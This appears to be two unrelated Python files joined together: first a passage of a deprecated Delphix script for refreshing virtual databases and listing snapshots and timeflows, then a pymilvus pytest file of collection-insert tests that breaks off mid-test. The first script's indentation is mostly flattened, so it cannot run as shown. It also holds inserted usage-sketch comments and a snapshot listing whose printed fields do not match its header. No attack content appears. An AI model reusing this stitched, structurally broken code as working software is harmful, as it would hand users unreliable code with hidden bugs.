"""
Return the object name from obj_reference
engine: A Delphix engine object.
obj_reference: The object reference to retrieve the name
"""
try:
obj_name = f_object.get(server, obj_reference)
return obj_name.name
except RequestError as e:
        raise DlpxException(e)
except HttpError as e:
raise DlpxException(e)
def list_snapshots(server):
"""
List all snapshots with timestamps
"""
header = "Snapshot Name, First Change Point, Location, Latest Change Point"
snapshots = snapshot.get_all(server)
print(header)
for snap in snapshots:
container_name = get_obj_name(server, database, snap.container)
snap_range = snapshot.timeflow_range(server, snap.reference)
print("{}, {}, {}, {}, {}".format(
str(snap.name),
container_name,
snap_range.start_point.timestamp,
snap_range.start_point.location,
snap_range.end_point.timestamp,
))
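# --- Hedged usage sketch (added for illustration, not part of the original script) ---
# Lists snapshots against one engine without going through docopt/main_workflow.
# The address and credentials are placeholders; serversess() is defined later in this file.
def example_list_snapshots():
    server = serversess("delphix.example.com", "delphix_admin", "password")
    list_snapshots(server)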
@run_async
def main_workflow(engine):
"""
This function is where we create our main workflow.
Use the @run_async decorator to run this function asynchronously.
    The @run_async decorator allows us to run against multiple Delphix Engines
    simultaneously.
"""
# Pull out the values from the dictionary for this engine
engine_address = engine["ip_address"]
engine_username = engine["username"]
engine_password = engine["password"]
# Establish these variables as empty for use later
databases = []
environment_obj = None
source_objs = None
jobs = {}
# Setup the connection to the Delphix Engine
server = serversess(engine_address, engine_username, engine_password)
# If an environment/server was specified
if host_name:
print_debug(engine["hostname"] + ": Getting environment for " + host_name)
# Get the environment object by the hostname
environment_obj = find_obj_by_name(engine, server, environment, host_name)
if environment_obj != None:
# Get all the sources running on the server
env_source_objs = source.get_all(
server, environment=environment_obj.reference
)
# If the server doesn't have any objects, exit.
if env_source_objs == None:
print_error(host_name + "does not have any objects. Exiting")
sys.exit(1)
# If we are only filtering by the server, then put those objects in
# the main list for processing
if not (arguments["--group_name"] and database_name):
source_objs = env_source_objs
all_dbs = database.get_all(server, no_js_container_data_source=True)
databases = []
for source_obj in source_objs:
if source_obj.staging == False and source_obj.virtual == True:
database_obj = database.get(server, source_obj.container)
if database_obj in all_dbs:
databases.append(database_obj)
else:
print_error(
engine["hostname"]
+ ":No environment found for "
+ host_name
+ ". Exiting"
)
sys.exit(1)
# If we specified a specific database by name....
if arguments["--name"]:
# Get the database object from the name
database_obj = find_obj_by_name(engine, server, database, arguments["--name"])
if database_obj:
databases.append(database_obj)
# Else if we specified a group to filter by....
elif arguments["--group_name"]:
print_debug(
engine["hostname"]
+ ":Getting databases in group "
+ arguments["--group_name"]
)
# Get all the database objects in a group.
databases = find_all_databases_by_group_name(
engine, server, arguments["--group_name"]
)
# Else if we specified a dSource to filter by....
elif arguments["--dsource"]:
print_debug(
engine["hostname"]
+ ":Getting databases for dSource"
+ arguments["--dsource"]
)
# Get all the database objects in a group.
databases = find_all_databases_by_dsource_name(
engine, server, arguments["--dsource"]
)
# Else, if we said all vdbs ...
elif arguments["--all_vdbs"] and not arguments["--host"]:
print_debug(engine["hostname"] + ":Getting all VDBs ")
        # Grab all databases, but filter out the databases that are in JetStream
# containers, because we can't refresh those this way.
databases = database.get_all(server, no_js_container_data_source=True)
elif arguments["--list_timeflows"]:
list_timeflows(server)
elif arguments["--list_snapshots"]:
list_snapshots(server)
# reset the running job count before we begin
i = 0
with job_mode(server):
# While there are still running jobs or databases still to process....
while len(jobs) > 0 or len(databases) > 0:
# While there are databases still to process and we are still under
# the max simultaneous jobs threshold (if specified)
while len(databases) > 0 and (
arguments["--parallel"] == None or i < int(arguments["--parallel"])
):
# Give us the next database in the list, and then remove it
database_obj = databases.pop()
# Get the source of the database.
source_obj = find_source_by_database(engine, server, database_obj)
# If we applied the environment/server filter AND group filter,
# find the intersecting matches
if environment_obj != None and (arguments["--group_name"]):
match = False
for env_source_obj in env_source_objs:
if source_obj[0].reference in env_source_obj.reference:
match = True
break
if match == False:
print_error(
engine["hostname"]
+ ": "
+ database_obj.name
+ " does not exist on "
+ host_name
+ ". Exiting"
)
return
# Refresh the database
refresh_job = refresh_database(
engine, server, jobs, source_obj[0], database_obj
)
# If refresh_job has any value, then we know that a job was
# initiated.
if refresh_job:
# increment the running job count
i += 1
# Check to see if we are running at max parallel processes, and
# report if so.
if arguments["--parallel"] != None and i >= int(arguments["--parallel"]):
print_info(engine["hostname"] + ": Max jobs reached (" + str(i) + ")")
i = update_jobs_dictionary(engine, server, jobs)
print_info(
engine["hostname"]
+ ": "
+ str(i)
+ " jobs running. "
+ str(len(databases))
+ " jobs waiting to run"
)
# If we have running jobs, pause before repeating the checks.
if len(jobs) > 0:
sleep(float(arguments["--poll"]))
def print_error(print_obj):
"""
Call this function with a log message to prefix the message with ERROR
"""
print("ERROR: " + str(print_obj))
logging.error(str(print_obj))
def print_warning(print_obj):
"""
Call this function with a log message to prefix the message with WARNING
"""
print("WARNING: " + str(print_obj))
logging.warning(str(print_obj))
def refresh_database(engine, server, jobs, source_obj, container_obj):
"""
This function actually performs the refresh
engine:
server: Engine object
jobs: list containing running jobs
source_obj: source object used to refresh from snapshot or timeflow
container_obj: VDB container
"""
# Sanity check to make sure our source object has a reference
if source_obj.reference:
# We can only refresh VDB's
if source_obj.virtual != True:
print_warning(
engine["hostname"]
+ ": "
+ container_obj.name
+ " is not a virtual object. Skipping."
)
# Ensure this source is not a staging database. We can't act upon those.
elif source_obj.staging == True:
print_warning(
engine["hostname"]
+ ": "
+ container_obj.name
+ " is a staging database. Skipping."
)
# Ensure the source is enabled. We can't refresh disabled databases.
elif source_obj.runtime.enabled == "ENABLED":
source_db = database.get(server, container_obj.provision_container)
if not source_db:
print_error(
engine["hostname"]
+ ":Was unable to retrieve the source container for "
+ container_obj.name
)
print_info(
engine["hostname"]
+ ": Refreshing "
+ container_obj.name
+ " from "
+ source_db.name
)
print_debug(engine["hostname"] + ": Type: " + source_obj.type)
print_debug(engine["hostname"] + ":" + source_obj.type)
# If the vdb is a Oracle type, we need to use a
# OracleRefreshParameters
if str(container_obj.reference).startswith("ORACLE"):
refresh_params = OracleRefreshParameters()
else:
refresh_params = RefreshParameters()
try:
refresh_params.timeflow_point_parameters = set_timeflow_point(
engine, server, source_db
)
print_debug(engine["hostname"] + ":" + str(refresh_params))
# Sync it
database.refresh(server, container_obj.reference, refresh_params)
jobs[container_obj] = server.last_job
except RequestError as e:
print("\nERROR: Could not set timeflow point:\n%s\n" % (
e.message.action
))
sys.exit(1)
except DlpxException as e:
print("ERROR: Could not set timeflow point:\n%s\n" % (e.message))
sys.exit(1)
# return the job object to the calling statement so that we can
# tell if a job was created or not (will return None, if no job)
return server.last_job
# Don't do anything if the database is disabled
else:
print_warning(
engine["hostname"]
+ ": "
+ container_obj.name
+ " is not enabled. Skipping sync"
)
def run_job(engine):
"""
This function runs the main_workflow aynchronously against all the
servers specified
"""
# Create an empty list to store threads we create.
threads = []
# If the --all argument was given, run against every engine in dxtools.conf
if arguments["--all"]:
print_info("Executing against all Delphix Engines in the dxtools.conf")
# For each server in the dxtools.conf...
for delphix_engine in dxtools_objects:
engine = dxtools_objects[delphix_engine]
# Create a new thread and add it to the list.
threads.append(main_workflow(engine))
else:
# Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments["--engine"]:
try:
engine = dxtools_objects[arguments["--engine"]]
print_info("Executing against Delphix Engine: " + arguments["--engine"])
except:
print_error(
'Delphix Engine "{}" cannot be found in "{}"'.format(
arguments["--engine"],
config_file_path,
)
)
print_error("Please check your value and try again. Exiting")
sys.exit(1)
# Else if the -d argument was given, test to see if the engine exists
# in dxtools.conf
elif arguments["-d"]:
try:
engine = dxtools_objects[arguments["-d"]]
print_info("Executing against Delphix Engine: " + arguments["-d"])
except:
print_error(
'Delphix Engine "'
+ arguments["-d"]
+ '" cannot be found in '
+ config_file_path
)
print_error("Please check your value and try again. Exiting")
sys.exit(1)
else:
# Else search for a default engine in the dxtools.conf
for delphix_engine in dxtools_objects:
if dxtools_objects[delphix_engine]["default"] == "true":
engine = dxtools_objects[delphix_engine]
print_info(
"Executing against the default Delphix Engine"
" in the dxtools.conf: "
+ dxtools_objects[delphix_engine]["hostname"]
)
break
            if engine is None:
print_error("No default engine found. Exiting")
sys.exit(1)
# run the job against the engine
threads.append(main_workflow(engine))
# For each thread in the list...
for each in threads:
# join them back together so that we wait for all threads to complete
# before moving on
each.join()
def serversess(f_engine_address, f_engine_username, f_engine_password):
"""
Function to setup the session with the Delphix Engine
"""
server_session = DelphixEngine(
f_engine_address, f_engine_username, f_engine_password, "DOMAIN"
)
return server_session
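# Usage sketch (hypothetical values): the engine entries parsed from dxtools.conf
# by get_config() supply the connection details, so a session is typically built as
#   server = serversess(engine["ip_address"], engine["username"], engine["password"])
# where "ip_address", "username" and "password" are assumed key names in that file.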
def list_timeflows(server):
"""
Retrieve and print all timeflows for a given engine
"""
ret_timeflow_dct = {}
all_timeflows = timeflow.get_all(server)
print("DB Name, Timeflow Name, Timestamp")
for tfbm_lst in all_timeflows:
try:
db_name = get_obj_name(server, database, tfbm_lst.container)
print("%s, %s, %s\n" % (
str(db_name),
str(tfbm_lst.name),
str(tfbm_lst.parent_point.timestamp),
))
except AttributeError:
print("%s, %s\n" % (str(tfbm_lst.name), str(db_name)))
except TypeError as e:
raise DlpxException(
"Listing Timeflows encountered an error:\n%s" % (e.message)
)
except RequestError as e:
dlpx_err = e.message
raise DlpxException(dlpx_err.action)
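# Illustrative output of list_timeflows() (made-up values; the exact timeflow name
# format may differ), matching the "DB Name, Timeflow Name, Timestamp" header above:
#   vdb_example, DB_REFRESH@2019-01-01T00:00:00.000Z, 2019-01-01T00:00:00.000Z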
def set_timeflow_point(engine, server, container_obj):
"""
    Build and return the timeflow point parameters for the snapshot or timestamp
    specified on the command line.
    engine: dictionary of engine attributes parsed from dxtools.conf
    server: Delphix Engine session object
    container_obj: VDB object
"""
if arguments["--timestamp_type"].upper() == "SNAPSHOT":
if arguments["--timestamp"].upper() == "LATEST":
print_debug(engine["hostname"] + ": Using the latest Snapshot")
timeflow_point_parameters = TimeflowPointSemantic()
timeflow_point_parameters.location = "LATEST_SNAPSHOT"
elif arguments["--timestamp"].startswith("@"):
print_debug(engine["hostname"] + ": Using a named snapshot")
snapshot_obj = find_snapshot_by_database_and_name(
engine, server, container_obj, arguments["--timestamp"]
)
if snapshot_obj:
timeflow_point_parameters = TimeflowPointLocation()
timeflow_point_parameters.timeflow = snapshot_obj.timeflow
timeflow_point_parameters.location = (
snapshot_obj.latest_change_point.location
)
else:
raise DlpxException(
"ERROR: Was unable to use the specified "
"snapshot %s for database %s.\n"
% (arguments["--timestamp"], container_obj.name)
)
elif arguments["--timestamp"]:
print_debug(engine["hostname"] + ": Using a time-designated snapshot")
snapshot_obj = find_snapshot_by_database_and_time(
engine, server, container_obj, arguments["--timestamp"]
)
if snapshot_obj:
timeflow_point_parameters = TimeflowPointTimestamp()
timeflow_point_parameters.timeflow = snapshot_obj.timeflow
timeflow_point_parameters.timestamp = (
snapshot_obj.latest_change_point.timestamp
)
else:
raise DlpxException(
"Was unable to find a suitable time"
" for %s for database %s"
% (arguments["--timestamp"], container_obj.name)
)
elif arguments["--timestamp_type"].upper() == "TIME":
if arguments["--timestamp"].upper() == "LATEST":
timeflow_point_parameters = TimeflowPointSemantic()
timeflow_point_parameters.location = "LATEST_POINT"
elif arguments["--timestamp"]:
timeflow_point_parameters = TimeflowPointTimestamp()
timeflow_point_parameters.type = "TimeflowPointTimestamp"
timeflow_obj = find_obj_by_name(
engine, server, timeflow, arguments["--timeflow"]
)
timeflow_point_parameters.timeflow = timeflow_obj.reference
timeflow_point_parameters.timestamp = arguments["--timestamp"]
return timeflow_point_parameters
else:
raise DlpxException(
arguments["--timestamp_type"] + " is not a valied timestamp_type. Exiting"
)
timeflow_point_parameters.container = container_obj.reference
return timeflow_point_parameters
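def _example_latest_snapshot_point(container_obj):
    """
    Illustrative sketch only (not called by this script): builds the same
    TimeflowPointSemantic that set_timeflow_point() returns for
    "--timestamp_type SNAPSHOT --timestamp LATEST", assuming container_obj is a
    database container object exposing a .reference attribute.
    """
    # Point at the latest snapshot of the given container
    timeflow_point_parameters = TimeflowPointSemantic()
    timeflow_point_parameters.location = "LATEST_SNAPSHOT"
    timeflow_point_parameters.container = container_obj.reference
    return timeflow_point_parameters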
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
    elapsed_minutes = round((time() - time_start) / 60, 1)
return elapsed_minutes
def update_jobs_dictionary(engine, server, jobs):
"""
This function checks each job in the dictionary and updates its status or
removes it if the job is complete.
Return the number of jobs still running.
"""
# Establish the running jobs counter, as we are about to update the count
# from the jobs report.
i = 0
# get all the jobs, then inspect them
    # iterate over a snapshot of the keys since completed jobs are removed below
    for j in list(jobs.keys()):
job_obj = job.get(server, jobs[j])
print_debug(engine["hostname"] + ": " + str(job_obj))
print_info(engine["hostname"] + ": " + j.name + ": " + job_obj.job_state)
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it from the running
# jobs list.
del jobs[j]
else:
# If the job is in a running state, increment the running job count.
i += 1
return i
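# Polling sketch (an assumption about how a caller consumes the count returned
# above, and assuming time.sleep is available as sleep):
#   while update_jobs_dictionary(engine, server, jobs) > 0:
#       sleep(10)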
def main(argv):
# We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global host_name
global database_name
global config_file_path
global dxtools_objects
try:
# Declare globals that will be used throughout the script.
logging_est(arguments["--logdir"])
print_debug(arguments)
time_start = time()
engine = None
single_thread = False
database_name = arguments["--name"]
host_name = arguments["--host"]
config_file_path = arguments["--config"]
# Parse the dxtools.conf and put it into a dictionary
dxtools_objects = get_config(config_file_path)
# This is the function that will handle processing main_workflow for
# all the servers.
run_job(engine)
elapsed_minutes = time_elapsed()
print_info("script took " + str(elapsed_minutes) + " minutes to get this far.")
# Here we handle what we do when the unexpected happens
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
print_error("Connection failed to the Delphix Engine")
print_error("Please check the ERROR message below")
print_error(e.message)
sys.exit(2)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so that we
have actionable data
"""
print_error("A job failed in the Delphix Engine")
print_error(e.job)
elapsed_minutes = time_elapsed()
print_info(
basename(__file__)
+ " took "
+ str(elapsed_minutes)
+ " minutes to get this far."
)
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info(
basename(__file__)
+ " took "
+ str(elapsed_minutes)
+ " minutes to get this far."
)
except:
"""
Everything else gets caught here
"""
print_error(sys.exc_info()[0])
print_error(traceback.format_exc())
elapsed_minutes = time_elapsed()
print_info(
basename(__file__)
+ " took "
+ str(elapsed_minutes)
+ " minutes to get this far."
)
sys.exit(1)
if __name__ == "__main__":
# Grab our arguments from the doc at the top of the script
print("THIS SCRIPT IS DEPRECATED. USE dx_refresh_vdb.py, instead")
sys.exit(1)
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
# Feed our arguments to the main function, and off we go!
main(arguments)
|
test_insert_20.py
|
import threading
import numpy as np
import pandas as pd
import pytest
from pymilvus import Index
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "insert"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
default_binary_index_params = {"index_type": "BIN_IVF_FLAT", "metric_type": "JACCARD", "params": {"nlist": 64}}
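# These module-level index parameter dicts are reused by the index-related cases
# below, e.g. (sketch): collection_w.create_index(ct.default_float_vec_field_name,
# default_index_params). "nlist" is the IVF cluster count; IVF_SQ8/L2 is used for
# float vectors and BIN_IVF_FLAT/JACCARD for binary vectors.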
class TestInsertParams(TestcaseBase):
""" Test case of Insert interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_data_type(self, request):
if isinstance(request.param, list) or request.param is None:
            pytest.skip("list and None types are valid data types")
yield request.param
@pytest.fixture(scope="module", params=ct.get_invalid_strs)
def get_invalid_field_name(self, request):
if isinstance(request.param, (list, dict)):
pytest.skip()
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dataframe_data(self):
"""
target: test insert DataFrame data
method: 1.create 2.insert dataframe data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_list_data(self):
"""
target: test insert list-like data
method: 1.create 2.insert list data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_non_data_type(self, get_non_data_type):
"""
target: test insert with non-dataframe, non-list data
method: insert with data (non-dataframe and non-list type)
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
error = {ct.err_code: 0, ct.err_msg: "Data type is not support"}
collection_w.insert(data=get_non_data_type, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("data", [[], pd.DataFrame()])
def test_insert_empty_data(self, data):
"""
target: test insert empty data
method: insert empty
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
error = {ct.err_code: 0, ct.err_msg: "The data fields number is not match with schema"}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_dataframe_only_columns(self):
"""
target: test insert with dataframe just columns
        method: dataframe just has columns
expected: num entities is zero
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_empty_field_name_dataframe(self):
"""
target: test insert empty field name df
method: dataframe with empty column
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: ' '}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_invalid_field_name_dataframe(self, get_invalid_field_name):
"""
target: test insert with invalid dataframe data
method: insert with invalid field name dataframe
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: get_invalid_field_name}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
def test_insert_dataframe_index(self):
"""
target: test insert dataframe with index
method: insert dataframe with index
expected: todo
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_insert_none(self):
"""
target: test insert None
method: data is None
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
mutation_res, _ = collection_w.insert(data=None)
assert mutation_res.insert_count == 0
assert len(mutation_res.primary_keys) == 0
assert collection_w.is_empty
assert collection_w.num_entities == 0
@pytest.mark.tags(CaseLabel.L1)
def test_insert_numpy_data(self):
"""
target: test insert numpy.ndarray data
method: 1.create by schema 2.insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_numpy_data(nb=10)
error = {ct.err_code: 0, ct.err_msg: "Data type not support numpy.ndarray"}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_dataframe(self):
"""
target: test insert binary dataframe
method: 1. create by schema 2. insert dataframe
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_data(self):
"""
target: test insert list-like binary data
method: 1. create by schema 2. insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
data, _ = cf.gen_default_binary_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_single(self):
"""
target: test insert single
method: insert one entity
expected: verify num
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=1)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == 1
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == 1
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_insert_dim_not_match(self):
"""
target: test insert with not match dim
method: insert data dim not equal to schema dim
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
dim = 129
df = cf.gen_default_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_insert_binary_dim_not_match(self):
"""
target: test insert binary with dim not match
method: insert binary data dim not equal to schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
dim = 120
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_field_name_not_match(self):
"""
target: test insert field name not match
method: data field name not match schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_float_field_name: "int"}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_field_value_not_match(self):
"""
target: test insert data value not match
method: insert data value type not match schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
df = cf.gen_default_dataframe_data(nb)
new_float_value = pd.Series(data=[float(i) for i in range(nb)], dtype="float64")
df.iloc[:, 1] = new_float_value
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_value_less(self):
"""
target: test insert value less than other
method: int field value less than vec-field value
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb - 1)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_vector_value_less(self):
"""
target: test insert vector value less than other
method: vec field value less than int field
expected: todo
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb - 1, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_fields_more(self):
"""
target: test insert with fields more
method: field more than schema fields
expected: todo
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
new_values = [i for i in range(ct.default_nb)]
df.insert(3, 'new', new_values)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_fields_less(self):
"""
target: test insert with fields less
method: fields less than schema fields
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
df.drop(ct.default_float_vec_field_name, axis=1, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_list_order_inconsistent_schema(self):
"""
target: test insert data fields order inconsistent with schema
method: insert list data, data fields order inconsistent with schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [float_values, int_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_dataframe_order_inconsistent_schema(self):
"""
target: test insert with dataframe fields inconsistent with schema
method: insert dataframe, and fields order inconsistent with schema
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = pd.Series(data=[i for i in range(nb)])
float_values = pd.Series(data=[float(i) for i in range(nb)], dtype="float32")
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
df = pd.DataFrame({
ct.default_float_field_name: float_values,
ct.default_float_vec_field_name: float_vec_values,
ct.default_int64_field_name: int_values
})
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_inconsistent_data(self):
"""
target: test insert with inconsistent data
method: insert with data that same field has different type data
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=100)
data[0][1] = 1.0
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
collection_w.insert(data, check_task=CheckTasks.err_res, check_items=error)
class TestInsertOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert interface operations
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_without_connection(self):
"""
target: test insert without connection
method: insert after remove connection
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
data = cf.gen_default_list_data(10)
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.parametrize("vec_fields", [[cf.gen_float_vec_field(name="float_vector1")],
[cf.gen_binary_vec_field()],
[cf.gen_binary_vec_field(), cf.gen_binary_vec_field("binary_vec")]])
def test_insert_multi_float_vec_fields(self, vec_fields):
"""
target: test insert into multi float vec fields collection
method: create collection and insert
expected: verify num entities
"""
schema = cf.gen_schema_multi_vector_fields(vec_fields)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_dataframe_multi_vec_fields(vec_fields=vec_fields)
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_drop_collection(self):
"""
target: test insert and drop
method: insert data and drop collection
expected: verify collection if exist
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_list, _ = self.utility_wrap.list_collections()
assert collection_w.name in collection_list
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
collection_w.drop()
collection_list, _ = self.utility_wrap.list_collections()
